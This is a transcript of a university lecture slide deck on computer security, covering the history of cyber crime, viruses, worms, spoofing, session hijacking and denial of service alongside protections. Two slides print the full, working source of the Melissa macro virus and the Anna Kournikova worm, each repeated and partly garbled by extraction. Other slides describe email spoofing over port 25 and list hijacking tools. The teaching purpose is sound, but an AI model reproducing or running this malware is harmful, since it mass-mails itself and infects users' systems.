This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Slide 1
Computer Security GSBA (Zurich): MIS Block Hacking
Slide 2
Sanjay Goel, School of Business, University at Albany 2 Crisis
Computer Crimes Hacker Attacks Modes of Computer Security Password
Security Network Security Web Security Distributed Systems Security
Database Security Topics
Slide 3
Sanjay Goel, School of Business, University at Albany 3
Internet has grown very fast and security has lagged behind.
Legions of hackers have emerged as impedance to entering the
hackers club is low. It is hard to trace the perpetrator of cyber
attacks since the real identities are camouflaged It is very hard
to track down people because of the ubiquity of the network. Large
scale failures of internet can have a catastrophic impact on the
economy which relies heavily on electronic transactions Crisis
Slide 4
Sanjay Goel, School of Business, University at Albany 4 In 1988
a "worm program" written by a college student shut down about 10
percent of computers connected to the Internet. This was the
beginning of the era of cyber attacks. Today we have about 10,000
incidents of cyber attacks which are reported and the number is
growing. Computer Crime The Beginning
Slide 5
Sanjay Goel, School of Business, University at Albany 5 A
16-year-old music student called Richard Pryce, better known by the
hacker alias Datastream Cowboy, is arrested and charged with
breaking into hundreds of computers including those at the
Griffiths Air Force base, Nasa and the Korean Atomic Research
Institute. His online mentor, "Kuji", is never found. Also this
year, a group directed by Russian hackers broke into the computers
of Citibank and transferred more than $10 million from customers'
accounts. Eventually, Citibank recovered all but $400,000 of the
pilfered money. Computer Crime - 1994
Slide 6
Sanjay Goel, School of Business, University at Albany 6 In
February, Kevin Mitnick is arrested for a second time. He is
charged with stealing 20,000 credit card numbers. He eventually
spends four years in jail and on his release his parole conditions
demand that he avoid contact with computers and mobile phones. On
November 15, Christopher Pile becomes the first person to be jailed
for writing and distributing a computer virus. Mr Pile, who called
himself the Black Baron, was sentenced to 18 months in jail. The US
General Accounting Office reveals that US Defense Department
computers sustained 250,000 attacks in 1995. Computer Crime -
1995
Slide 7
Sanjay Goel, School of Business, University at Albany 7 In
March, the Melissa virus goes on the rampage and wreaks havoc with
computers worldwide. After a short investigation, the FBI tracks
down and arrests the writer of the virus, a 29-year-old New Jersey
computer programmer, David L. Smith. More than 90 percent of large
corporations and government agencies were the victims of computer
security breaches in 1999 Computer Crime - 1999
Slide 8
Sanjay Goel, School of Business, University at Albany 8 In
February, some of the most popular websites in the world such as
Amazon and Yahoo are almost overwhelmed by being flooded with bogus
requests for data. In May, the ILOVEYOU virus is unleashed and
clogs computers worldwide. Over the coming months, variants of the
virus are released that manage to catch out companies that didn't
do enough to protect themselves. In October, Microsoft admits that
its corporate network has been hacked and source code for future
Windows products has been seen. Computer Crime - 2000
Slide 9
Sanjay Goel, School of Business, University at Albany 9 In
April 2002, computer hackers calling themselves Deceptive Duo
announced that they had begun their mission of breaking into
computer systems to call attention to the vulnerabilities in the US
National Security In subsequent weeks they hacked into 52 web sites
and databases including those operated by the US office of
secretary of defense, the space and Naval Warfare Systems Command,
The Defense Logistics Agency, Sandia National Lab, NASA JPL,
Airlines, Banks Computer Crime - 2002
Slide 10
Sanjay Goel, School of Business, University at Albany 10
Intrusion Incident Reports Note: Projected from 3 quarters of
data
Slide 11
Sanjay Goel, School of Business, University at Albany 11
Increased complexity of the systems Large networks with switches,
hubs, gateways provide multiple entry points Very sophisticated
software using millions of lines of code which leave holes for
hackers to attack Constantly upgrading computer systems and
software Support staff not able to keep up with security provisions
New technology (often not fully tested) adds new risk Lack of
proper education Managers do not realize the vulnerabilities and
are not willing to invest in technology that does not directly
effect the bottom line Dependence on commercial software with known
vulnerabilities e.g. Microsoft Windows OS and Outlook Why are we
vulnerable?
Slide 12
Sanjay Goel, School of Business, University at Albany 12
VIRUSES
Slide 13
Sanjay Goel, School of Business, University at Albany 13
Computer viruses are self-replicating software entities that attach
themselves parasitically to existing programs. The virus spreads by
creating replica of itself and attaching itself to other executable
programs to which it has write access. A true virus does not spread
from machine to machine on its own. It must be passed on to other
users via e-mail, infected files/diskettes, programs or shared
files The viruses normally consist of two parts Replicator:
responsible for copying the virus to other executable programs.
Payload: Action of the virus,which may be benign such as printing a
weird message, playing music or malicious such as destroying data
or corrupting the hard disk. Virus
Slide 14
Sanjay Goel, School of Business, University at Albany 14 When a
user executes an infected program (an executable file or boot
sector), the viral portion of the code typically executes first and
then the control returns to the original program, which executes
normally. Unless the virus executes a payload which the user
observes the user is not likely to find the virus operating on
his/her hard drive. Viruses can persist in your programs for a long
time without being detected thus constantly upgrading your virus
signatures and running virus scans is very important. Virus
Slide 15
Sanjay Goel, School of Business, University at Albany 15
Polymorphic viruses Viruses which modify themselves prior to
attaching themselves to another program. These are hard to detect
since they are constantly changing their signature. Macro Viruses
These viruses use an application macro language (such as VB or
VBScript) to create programs that infect documents and templates If
an infected document is opened the virus is executed and it infects
the users application templates Virus
Slide 16 "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1& Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1
- 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook,
DasMapiName, BreakUmOffASlice Set UngaDasOutlook =
CreateObject("Outlook.Application") Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI") If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by
Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon
"profile", "password" For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set
BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To
AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo
= AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject =
"Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for...
don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y
DasMapiName.Logoff End If Melissa Virus
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "...
by Kwyjibo" End If Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 =
NormalTemplate.VBProject.VBComponents.Item(1) NTCL =
NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines
BGN = 2 If ADI1.Name "Melissa" Then If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name =
"Melissa" DoAD = True End If If NTI1.Name "Melissa" Then If NTCL
> 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect =
NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT True And DoAD
True Then GoTo CYA If DoNT = True Then Do While
ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If If DoAD = True Then Do While
NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If CYA: If NTCL 0 And ADCL = 0 And (InStr(1,
ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf
(InStr(1, ActiveDocument.Name, "Document") False) Then
ActiveDocument.Saved = True: End If 'WORD/Melissa written by
Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus?
Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email |
Word 97 Word 2000... it's a new age! If Day(Now) = Minute(Now) Then
Selection.TypeText " Twenty-two points, plus triple-word-score,
plus fifty points for using all my letters. Game's over. I'm outta
here." End Sub">
Sanjay Goel, School of Business, University at Albany 16 //
Melissa Virus Source Code Private Sub Document_Open() On Error
Resume Next If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1& Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1
- 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook,
DasMapiName, BreakUmOffASlice Set UngaDasOutlook =
CreateObject("Outlook.Application") Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI") If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by
Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon
"profile", "password" For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set
BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To
AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo
= AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject =
"Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for...
don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y
DasMapiName.Logoff End If Melissa Virus
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "...
by Kwyjibo" End If Set ADI1 =
ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 =
NormalTemplate.VBProject.VBComponents.Item(1) NTCL =
NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines
BGN = 2 If ADI1.Name "Melissa" Then If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name =
"Melissa" DoAD = True End If If NTI1.Name "Melissa" Then If NTCL
> 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect =
NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT True And DoAD
True Then GoTo CYA If DoNT = True Then Do While
ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If If DoAD = True Then Do While
NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1 Loop End If CYA: If NTCL 0 And ADCL = 0 And (InStr(1,
ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf
(InStr(1, ActiveDocument.Name, "Document") False) Then
ActiveDocument.Saved = True: End If 'WORD/Melissa written by
Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus?
Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email |
Word 97 Word 2000... it's a new age! If Day(Now) = Minute(Now) Then
Selection.TypeText " Twenty-two points, plus triple-word-score,
plus fifty points for using all my letters. Game's over. I'm outta
here." End Sub
Slide 17
Sanjay Goel, School of Business, University at Albany 17 Worms
are a form of self-replicating programs that can automatically
spread. Unlike the viruses they do not need a carrier program and
they replicate by spawning copies of themselves. They are more
complex and are much harder to write than the virus programs.
ILOVEYOU worm in 2000 automatically emailed itself to the first 200
entries in the outlook address book The worm spread to 10 million
computers in two days which were required to create a patch for it
It cost billions of dollars to repair the damage Sometimes worms
take a long time to spread Anna Kournikova worm was discovered in
August 2000 and became a serious threat in February 2001 CodeRed,
Nimbda, SirCam are other worms each of which cost upwards of 500
million dollars in damages Worms
Slide 18 "1" then doMail() end if if month(now) = 1 and
day(now) = 26 then WScriptShell.run
"Http://www.dynabyte.nl",3,false end if Set thisScript =
FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall thisScript.Close Do If Not
(FileSystemObject.fileexists(wscript.scriptfullname)) Then Set
newFile = FileSystemObject.createtextfile(wscript.scriptfullname,
True) newFile.write thisScriptText newFile.Close End If Loop
Function doMail() On Error Resume Next Set OutlookApp =
CreateObject("Outlook.Application") If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI") Set
AddressLists = MAPINameSpace.AddressLists For Each address In
AddressLists If address.AddressEntries.Count 0 Then entryCount =
address.AddressEntries.Count For i = 1 To entryCount Set newItem =
OutlookApp.CreateItem(0) Set currentAddress =
address.AddressEntries(i) newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)" newItem.Body = "Hi:" &
vbcrlf & "Check This!" & vbcrlf & "" set attachments =
newItem.Attachments attachments.Add
FileSystemObject.GetSpecialFolder(0) &
"\AnnaKournikova.jpg.vbs" newItem.DeleteAfterSubmit = True If
newItem.To "" Then newItem.Send WScriptShell.regwrite
"HKCU\software\OnTheFly\mailed", "1" End If Next End If Next end if
End Function 'Vbswg 1.50b Worm (Anna Kournikova)">
Sanjay Goel, School of Business, University at Albany 18
'Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set
WScriptShell = CreateObject("WScript.Shell") WScriptShell.regwrite
"HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b" Set
FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile
wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) &
"\AnnaKournikova.jpg.vbs" if WScriptShell.regread
("HKCU\software\OnTheFly\mailed") "1" then doMail() end if if
month(now) = 1 and day(now) = 26 then WScriptShell.run
"Http://www.dynabyte.nl",3,false end if Set thisScript =
FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall thisScript.Close Do If Not
(FileSystemObject.fileexists(wscript.scriptfullname)) Then Set
newFile = FileSystemObject.createtextfile(wscript.scriptfullname,
True) newFile.write thisScriptText newFile.Close End If Loop
Function doMail() On Error Resume Next Set OutlookApp =
CreateObject("Outlook.Application") If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI") Set
AddressLists = MAPINameSpace.AddressLists For Each address In
AddressLists If address.AddressEntries.Count 0 Then entryCount =
address.AddressEntries.Count For i = 1 To entryCount Set newItem =
OutlookApp.CreateItem(0) Set currentAddress =
address.AddressEntries(i) newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)" newItem.Body = "Hi:" &
vbcrlf & "Check This!" & vbcrlf & "" set attachments =
newItem.Attachments attachments.Add
FileSystemObject.GetSpecialFolder(0) &
"\AnnaKournikova.jpg.vbs" newItem.DeleteAfterSubmit = True If
newItem.To "" Then newItem.Send WScriptShell.regwrite
"HKCU\software\OnTheFly\mailed", "1" End If Next End If Next end if
End Function 'Vbswg 1.50b Worm (Anna Kournikova)
Slide 19
Sanjay Goel, School of Business, University at Albany 19 This
is a program that secretly gets installed on a computer planting a
secret payload that can allow a hacker who planted it access to do
things such as stealing passwords or recording key strokes and
transmitting them to a third party A logic bomb is a trojan horse
that executes when certain conditions become true Most commonly
executes at a specific date and time Example: Cute Trojan Horse
allows hackers to destroy the firewalls installed on computers.
Trojan Horse
Slide 20
Sanjay Goel, School of Business, University at Albany 20
HACKERS
Slide 21
Sanjay Goel, School of Business, University at Albany 21 Most
hackers try to test the system limitations out of intellectual
curiosity & bragging rights Cyber criminals hack into corporate
computers to steal money or credit card numbers In March 2001 FBI
reported that over 1 million credit card numbers were stolen by
cyber criminals in Russia & Ukraine Cyber terrorists try to
push their political agenda by coercion via computer-based attacks
against computers and networks NATO computers were blasted with
infected emails to protest against bombings in Kosovo during the
1999 conflict Lucent was made target for DOS attacks by a group
protesting against its business with Israel Disgruntled employees
often venting anger at a company or organization by hacking &
stealing information or causing damage to computer systems Why do
Hackers Attack?
Slide 22
Sanjay Goel, School of Business, University at Albany 22 Active
Attacks Denial of Service Breaking into a site Intelligence
Gathering Resource Usage Deception Passive Attacks Sniffing
Passwords Network Traffic Sensitive Information Information
Gathering Types of Hacker Attack
Slide 23
Sanjay Goel, School of Business, University at Albany 23
Spoofing Session Hijacking Denial of Service Attacks Buffer
Overflow Attacks Password Attacks Modes of Hacker Attack
Slide 24
Sanjay Goel, School of Business, University at Albany 24
Definition: An attacker alters his identity so that some one thinks
he is some one else Email, User ID, IP Address, Attacker exploits
trust relation between user and networked machines to gain access
to machines Types of Spoofing: 1.IP Spoofing: 2.Email Spoofing
3.Web Spoofing Spoofing
Slide 25
Sanjay Goel, School of Business, University at Albany 25 There
are three basic flavors of IP spoofing attacks Basic Address Change
Use of source routing to intercept packets Exploiting of a trust
relationship on UNIX machines IP Spoofing
Slide 26
Sanjay Goel, School of Business, University at Albany 26
Definition: Attacker uses IP address of another computer to acquire
information or gain access IP Spoofing Basic Address Change Replies
sent back to 10.10.20.30 Spoofed Address 10.10.20.30 Attacker
10.10.50.50 John 10.10.5.5 From Address: 10.10.20.30 To Address:
10.10.5.5 Attacker changes his own IP address to spoofed address
Attacker can send messages to a machine masquerading as spoofed
machine Attacker can not receive messages from that machine
Slide 27
Sanjay Goel, School of Business, University at Albany 27 Simple
Mechanism From start menu select settings Control Panel Double
click on the network icon Right click the LAN connection and select
properties select Internet Protocol (TCP/IP) and click on
properties Change the IP address to the address you want to spoof
Reboot the machine All packets sent from the machine have the
spoofed address Basic Address Change (Windows)
Slide 28
Sanjay Goel, School of Business, University at Albany 28 Use
ifconfig command Write Details Basic Address Change (Unix)
Slide 29
Sanjay Goel, School of Business, University at Albany 29
Limitation Flying Blind Attack i.e. user can not get return
messages Any protocol which requires 3-way connection can not be
used UDP which is connectionless can be used to send packets Uses
Used in denial-of-service attack where a single packet can crash a
machine IP-Spoofing (Basic Address Change)
Slide 30
Sanjay Goel, School of Business, University at Albany 30
Prevention You can protect your machines from being used to launch
a spoofing attack You can do little to prevent other people from
spoofing your address Users can be prevented from having access to
network configuration To protect your company from spoofing attack
you can apply basic filters at your routers Ingress Filtering:
Prevent packets from outside coming in with address from inside.
Egress Filtering: Prevents packets not having an internal address
from leaving the network IP Spoofing Basic Address Change
Slide 31
Sanjay Goel, School of Business, University at Albany 31
Definition: Attacker spoofs the address of another machine and
inserts itself between the attacked machine and the spoofed machine
to intercept replies IP Spoofing Source Routing Replies sent back
to 10.10.20.30 Spoofed Address 10.10.20.30 Attacker 10.10.50.50
John 10.10.5.5 From Address: 10.10.20.30 To Address: 10.10.5.5 The
path a packet may change can vary over time Attacker intercepts
packets as they go to 10.10.20.30
Slide 32
Sanjay Goel, School of Business, University at Albany 32
Attacker uses source routing to ensure that the packets pass
through certain nodes on the network Loose Source Routing (LSR):
The sender specifies a list of addresses that the packet must go
through but it can go to any other address if it needs to. Strict
Source Routing (SSR): The sender specifies the exact path for the
packet and the packet is dropped if the exact path can not be
taken. Source Routing works by using a 39-byte source route option
field in the IP header Works by picking one node address at a time
sequentially A maximum of 9 nodes in the path can be specified
Source Routing was introduced into the TCP spec for debugging and
testing redundancy in the network IP Spoofing Source Routing
Contd.
Slide 33
Sanjay Goel, School of Business, University at Albany 33
Tracert: Windows NT utility runs at a Command prompt. Traces a path
from your machine to the URL or IP address given along with the
tracert command. Usage: tracert [-d] [-h maximum_hops] [-j
host-list] [-w timeout] target_name Options: -d Do not resolve
addresses to hostnames. -h maximum_hops Maximum number of hops to
search for target. -j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply. Tracing a URL:
tracert www.techadvice.com Tracing route to www.techadvice.com
[63.69.55.237] over a maximum of 30 hops: 1 181 ms 160 ms 170 ms
border0.Srvf.Rx2.abc [63.69.55.237] 2 170 ms 170 ms 160 ms
192.168.0.2 3..... IP Spoofing Source Routing contd.
Slide 34
Sanjay Goel, School of Business, University at Albany 34
Tracing an IP-Address: tracert 3.1.6.62 Tracing using loose source
routing: tracert j 3.2.1.44 3.3.1.42 Protection Disable source
routing at your routers IP Spoofing Source Routing contd.
Slide 35
Sanjay Goel, School of Business, University at Albany 35 In
UNIX trust relationships can be set up between multiple machines
After trust becomes established the user can use Unix r commands to
access sources on different machines A.rhosts file is set up on
individual machines or /etc/hosts.equiv is used to set it up at the
system level Trust relationship is easy to spoof If user realizes
that a machine trusts the IP address 10.10.10.5 he can spoof that
address and he is allowed access without password The responses go
back to the spoofed machine so this is still a flying blind attack.
Protection Do not use trust relations Do not allow trust
relationships on the internet and limit them within the company
Monitor which machines and users can have trust without
jeopardizing critical data or function IP Spoofing Trust
Relationships
Slide 36
Sanjay Goel, School of Business, University at Albany 36
Definition: Attacker sends messages masquerading as some one else
What can be the repercussions? Reasons: Attackers want to hide
their identity while sending messages (sending anonymous emails)
User sends email to anonymous e-mailer which sends emails to the
intended recipient Attacker wants to impersonate someone To get
someone in trouble Social engineering Get information by pretending
to be someone else Email Spoofing
Slide 37
Sanjay Goel, School of Business, University at Albany 37 Create
an account with similar email address [email protected]: A
message from this account can perplex the students Most mailers
have an alias field (this can be used to prescribe any name.
Example Class: I am too sick to come to the class tomorrow so the
class is cancelled. The assignments that were due are now due next
week. Sanjay Goel Email Spoofing Similar Name Account
Slide 38
Sanjay Goel, School of Business, University at Albany 38
Protection Educating the employees in a corporation to be cautious
Make sure that the full email address rather than alias is
displayed Institute policy that all official communication be done
using company email Use PKI where digital signature of each
employee is associated with the email Email Spoofing Similar Name
Account
Slide 39
Sanjay Goel, School of Business, University at Albany 39 Modify
a mail client When email is sent from the user no authentication is
performed on the from address Attacker can put in any return
address he wants to in the mail he sends Protection Education Audit
Logging Looking at the full email address Email Spoofing Mail
Client
Slide 40
Sanjay Goel, School of Business, University at Albany 40 Telnet
to port 25 Most mail servers use port 25 for SMTP. An attacker runs
a port scan and gets the IP address of machine with port 25 open
telnet ip-adress 25 (cmd to telnet to port 25) Attacker logs on to
this port and composes a message for the user. Example: Hello mail
from:spoofed-email-address Rcpt to: person-sending-mail-to Data
(message you want to send) Period sign at the end of the message
Email Spoofing Telnet to Port 25
Slide 41
Sanjay Goel, School of Business, University at Albany 41 Mail
relaying is the sending of email to a person on a different domain
Protection Make sure that the recipients domain is the same as the
the mail server New SMTP servers disallow mail relaying From a
remote connection the from and to addresses are from the same
domain as the mail server Make sure that spoofing and relay filters
are configured Email Spoofing Telnet to Port 25
Slide 42
Sanjay Goel, School of Business, University at Albany 42 Basic
Man-in-the-Middle Attack URL Rewriting Tracking State Web
Spoofing
Slide 43
Sanjay Goel, School of Business, University at Albany 43 No
requirement against registering a domain Attacker registers a web
address matching an entity e.g. votebush.com, geproducts.com,
gesucks.com Process Hacker sets up a spoofed site User goes to the
spoofed site Clicks on items to order and checks out Site prompts
user for credit card information Gives the user a cookie Puts
message Site experiencing technical difficulty When user tries back
spoofed site checks cookie Already has credit card number so
directs the user to legitimate site Web Spoofing - Basic
Slide 44
Sanjay Goel, School of Business, University at Albany 44
Protection Use server side certificates Certificates much harder to
spoof Users need to ensure that the certificates are legitimate
before clicking on OK to accept certificate Web Spoofing -
Basic
Slide 45
Sanjay Goel, School of Business, University at Albany 45
Man-in-the-Middle Attack Attacker acts as a proxy between the web
server and the client Attacker has to compromise the router or a
node through which the relevant traffic flows Protection Secure the
perimeter to prevent compromise of routers Web Spoofing Man in the
Middle Attack
Slide 46
Sanjay Goel, School of Business, University at Albany 46 URL
Rewriting Attacker redirects web traffic to another site that is
controlled by the attacker Attacker writes his own web site address
before the legitimate link e.g. The user is first directed to the
hacker site and then redirected to the actual site Protections Web
browsers should be configured to always show complete address
Ensure that the code for the web sites is properly protected at the
server end and during transit Web Spoofing URL Rewriting
Slide 47
Sanjay Goel, School of Business, University at Albany 47
Tracking State When a user logs on to a site a persistent
authentication is maintained This authentication can be stolen for
masquerading as the user Web Spoofing
Slide 48
Sanjay Goel, School of Business, University at Albany 48
Browsers primarily use Http protocol to communicate Http is a
stateless protocol Web Sites need to maintain persistent
authentication so that user does not have to authenticate
repeatedly This authentication can be stolen for masquerading as
the user Tracking State Web ServerDatabaseBrowser Request
Response
Slide 49
Sanjay Goel, School of Business, University at Albany 49 Three
types of tracking methods are used: 1.Cookies: Line of text with ID
on the users cookie file Attacker can read the ID from users cookie
file 2.URL Session Tracking: An id is appended to all the links in
the website web pages. Attacker can guess or read this id and
masquerade as user 3.Hidden Form Elements ID is hidden in form
elements which are not visible to user Hacker can modify these to
masquerade as another user Web Spoofing Tracking State
Slide 50
Sanjay Goel, School of Business, University at Albany 50
Cookies are a piece of information that the server passes to the
browser and the browser stores on the server Set of name value
pairs Web servers place cookies on user machines with id to track
the users Two types of cookies Persistent cookies: Stored on hard
drive in text format Non-persistent cookies: Stored in memory and
goes away after you reboot or turn off the machine Attacker gets
cookies by: Accessing the victim hard drive Guessing Ids which
different web servers assign Web Spoofing Tracking State
Cookies
Slide 51
Sanjay Goel, School of Business, University at Albany 51
Protection Physical protection of hard drives is best protection
Use non-persistent cookies since hacker has to access and edit
memory to get to it. Use random, hard to guess ID Web Spoofing
Tracking State Cookies
Slide 52
Sanjay Goel, School of Business, University at Albany 52
http:// www.address.edu:1234/path/subdir/file.ext?query_string
Service http Host www. Address. edu Port 1234 /path/subdur/file.ext
resource path on the server query_string additional information
that can be passed to resource Http allows name value pairs to be
passed to the resource http: // www. test.
edu/index.jsp?firstname=sanjay+lastname=goel The server can place
the id of a customer along with the URL
http://www.fake.com/ordering/id=928932888329938.823948 This number
can be obtained by guessing or looking over some ones shoulder
Timeout for the sessions may be a few hours User can masquerade as
the owner of the id and transact on the web Web Spoofing Tracking
State URL Encoding
Slide 53
Sanjay Goel, School of Business, University at Albany 53 Server
Side Use large, hard to guess identifiers Keep the session
inactivity time low User Side Make sure that no one is looking over
your shoulder as you browse Do not leave terminals unattended Use
server side certificates A server side certificate is a certificate
that the server presents to a client to prove identity Users should
verify the certificates prior to clicking OK on the accept button
Web Spoofing URL Encoding Protection
Slide 54
Sanjay Goel, School of Business, University at Albany 54 HTML
allows creation of hidden fields in the forms Developers exploit
this to store information for their reference ID can be stored as a
hidden form field Protection Hard to guess ids Short expiry times
Web Spoofing Tracking State Cookies
Slide 55
Sanjay Goel, School of Business, University at Albany 55
Disable JavaScript, ActiveX and other scripting languages that
execute locally or in the browser Make sure that the browsers
location line is always visible Educate the users Make hard to
guess session ids Use server side certificates A server side
certificate is a certificate that the server presents to a client
to prove identity Users should verify the certificates prior to
clicking OK on the accept button Web Spoofing General
Protection
Slide 56
Sanjay Goel, School of Business, University at Albany 56
Definition: Process of taking over an existing active session Modus
Operandi: 1.User makes a connection to the server by authenticating
using his user ID and password. 2.After the users authenticate,
they have access to the server as long as the session lasts.
3.Hacker takes the user offline by denial of service 4.Hacker gains
access to the user by impersonating the user Session Hijacking
Slide 57
Sanjay Goel, School of Business, University at Albany 57
Attacker can monitor the session periodically inject commands into
session launch passive and active attacks from the session Session
Hijacking Bob telnets to Server Bob authenticates to Server Bob
Attacker Server Die!Hi! I am Bob
Slide 58
Sanjay Goel, School of Business, University at Albany 58
Attackers exploit sequence numbers to hijack sessions Sequence
numbers are 32-bit counters used to: tell receiving machines the
correct order of packets Tell sender which packets are received and
which are lost Receiver and Sender have their own sequence numbers
When two parties communicate the following are needed: IP addresses
Port Numbers Sequence Number IP addresses and port numbers are
easily available so once the attacker gets the server to accept his
guessed sequence numbers he can hijack the session. Session
Hijacking How Does it Work?
Slide 59
Sanjay Goel, School of Business, University at Albany 59
Juggernaut Network sniffer that that can also be used for hijacking
Get from http://packetstorm.securify.com Hunt Can be use to listen,
intercept and hijack active sessions on a network
http://lin.fsid.cvut.cz/~kra/index.html TTY Watcher Freeware
program to monitor and hijack sessions on a single host
http://www.cerias.purdue.edu IP Watcher Commercial session
hijacking tool based on TTY Watcher http://www.engrade.com Session
Hijacking Programs
Slide 60
Sanjay Goel, School of Business, University at Albany 60 Use
Encryption Prevents hacker from intercepting packets Use a secure
protocol for sensitive work E.g. administering remote machines
Limit incoming connections Minimize remote access Strong
authentication ineffective Since the authentication is only done at
beginning of the session Session Hijacking Protection
Slide 61
Sanjay Goel, School of Business, University at Albany 61
Definition: Attack through which a person can render a system
unusable or significantly slow down the system for legitimate users
by overloading the system so that no one else can use it. Types:
1.Crashing the system or network Send the victim data or packets
which will cause system to crash or reboot. 2.Exhausting the
resources by flooding the system or network with information Since
all resources are exhausted others are denied access to the
resources 3.Distributed DOS attacks are coordinated denial of
service attacks involving several people and/or machines to launch
attacks Denial of Service (DOS) Attack
Slide 62
Sanjay Goel, School of Business, University at Albany 62 Types:
1.Ping of Death 2.SSPing 3.Land 4.Smurf 5.SYN Flood 6.CPU Hog 7.Win
Nuke 8.RPC Locator 9.Jolt2 10.Bubonic 11.Microsoft Incomplete
TCP/IP Packet Vulnerability 12.HP Openview Node Manager SNMP DOS
Vulnerability 13.Netscreen Firewall DOS Vulnerability 14.Checkpoint
Firewall DOS Vulnerability Denial of Service (DOS) Attack
Slide 63
Sanjay Goel, School of Business, University at Albany 63
Effective robust design Create redundant servers Distribute your
servers across different ISPs Bandwidth limitations Limit available
band width based on protocol Keep systems patched Prevents attacks
